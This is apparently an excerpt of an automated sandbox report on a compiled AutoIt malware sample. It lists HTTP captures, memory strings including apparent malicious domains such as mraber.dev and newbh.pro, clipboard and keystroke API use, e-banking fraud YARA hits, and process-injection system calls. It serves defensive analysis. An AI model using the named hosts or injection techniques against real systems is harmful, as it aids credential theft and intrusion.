  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Sat, 11 Jan 2025 05:56:27 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Sat, 11 Jan 2025 05:56:30 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Sat, 11 Jan 2025 05:56:32 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: firefox.exe, 00000008.00000002.2345513606.0000021D37B2D000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.linkdex.com/bots/)
                Source: FKUPIibLrFYhJ.exe, 00000007.00000002.3561922988.00000000050D4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.mraber.dev
                Source: FKUPIibLrFYhJ.exe, 00000007.00000002.3561922988.00000000050D4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.mraber.dev/ixqi/
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: relog.exe, 00000006.00000002.3559238568.00000000030DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: relog.exe, 00000006.00000003.2222278855.000000000813B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.00000000034EA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0060EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard | 0_2_0060EAFF
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0060ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_0060ED6A
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005FAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput | 0_2_005FAA57
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00629576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_00629576

                E-Banking Fraud

                Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: BDlwy8b7Km.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: BDlwy8b7Km.exe, 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_f2cb35ee-a
                Source: BDlwy8b7Km.exe, 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_db27d3c4-b
                Source: BDlwy8b7Km.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_cf7ebdf7-5
                Source: BDlwy8b7Km.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_469db00c-9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C4A3 NtClose | 1_2_0042C4A3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672B60 NtClose,LdrInitializeThunk | 1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk | 1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk | 1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03674340 NtSetContextThread | 1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03674650 NtSuspendThread | 1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672BE0 NtQueryValueKey | 1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672BF0 NtAllocateVirtualMemory | 1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672BA0 NtEnumerateValueKey | 1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672B80 NtQueryInformationFile | 1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672AF0 NtWriteFile | 1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672AD0 NtReadFile | 1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672AB0 NtWaitForSingleObject | 1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672F60 NtCreateProcessEx | 1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672F30 NtCreateSection | 1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672FE0 NtCreateFile | 1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672FA0 NtQuerySection | 1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672FB0 NtResumeThread | 1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672F90 NtProtectVirtualMemory | 1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672E30 NtWriteVirtualMemory | 1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672EE0 NtQueueApcThread | 1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672EA0 NtAdjustPrivilegesToken | 1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672E80 NtReadVirtualMemory | 1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672D30 NtUnmapViewOfSection | 1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672D00 NtSetInformationFile | 1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672D10 NtMapViewOfSection | 1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672DD0 NtDelayExecution | 1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672DB0 NtEnumerateKey | 1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672C60 NtCreateKey | 1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672C70 NtFreeVirtualMemory | 1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672C00 NtQueryInformationProcess | 1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672CF0 NtOpenProcess | 1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672CC0 NtQueryVirtualMemory | 1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03672CA0 NtQueryInformationToken | 1_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03673010 NtOpenDirectoryObject | 1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03673090 NtSetValueKey | 1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036739B0 NtGetContextThread | 1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03673D70 NtOpenThread | 1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03673D10 NtOpenProcessToken | 1_2_03673D10
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03674340 NtSetContextThread,LdrInitializeThunk | 6_2_03674340
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03674650 NtSuspendThread,LdrInitializeThunk | 6_2_03674650
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672B60 NtClose,LdrInitializeThunk | 6_2_03672B60
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672BE0 NtQueryValueKey,LdrInitializeThunk | 6_2_03672BE0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 6_2_03672BF0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672BA0 NtEnumerateValueKey,LdrInitializeThunk | 6_2_03672BA0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672AF0 NtWriteFile,LdrInitializeThunk | 6_2_03672AF0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672AD0 NtReadFile,LdrInitializeThunk | 6_2_03672AD0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672F30 NtCreateSection,LdrInitializeThunk | 6_2_03672F30
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672FE0 NtCreateFile,LdrInitializeThunk | 6_2_03672FE0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672FB0 NtResumeThread,LdrInitializeThunk | 6_2_03672FB0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672EE0 NtQueueApcThread,LdrInitializeThunk | 6_2_03672EE0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672E80 NtReadVirtualMemory,LdrInitializeThunk | 6_2_03672E80
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672D30 NtUnmapViewOfSection,LdrInitializeThunk | 6_2_03672D30
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672D10 NtMapViewOfSection,LdrInitializeThunk | 6_2_03672D10
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk | 6_2_03672DF0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672DD0 NtDelayExecution,LdrInitializeThunk | 6_2_03672DD0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672C60 NtCreateKey,LdrInitializeThunk | 6_2_03672C60
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk | 6_2_03672C70
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672CA0 NtQueryInformationToken,LdrInitializeThunk | 6_2_03672CA0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_036735C0 NtCreateMutant,LdrInitializeThunk | 6_2_036735C0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_036739B0 NtGetContextThread,LdrInitializeThunk | 6_2_036739B0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672B80 NtQueryInformationFile | 6_2_03672B80
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672AB0 NtWaitForSingleObject | 6_2_03672AB0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672F60 NtCreateProcessEx | 6_2_03672F60
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672FA0 NtQuerySection | 6_2_03672FA0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672F90 NtProtectVirtualMemory | 6_2_03672F90
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672E30 NtWriteVirtualMemory | 6_2_03672E30
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672EA0 NtAdjustPrivilegesToken | 6_2_03672EA0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672D00 NtSetInformationFile | 6_2_03672D00
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672DB0 NtEnumerateKey | 6_2_03672DB0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672C00 NtQueryInformationProcess | 6_2_03672C00
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672CF0 NtOpenProcess | 6_2_03672CF0
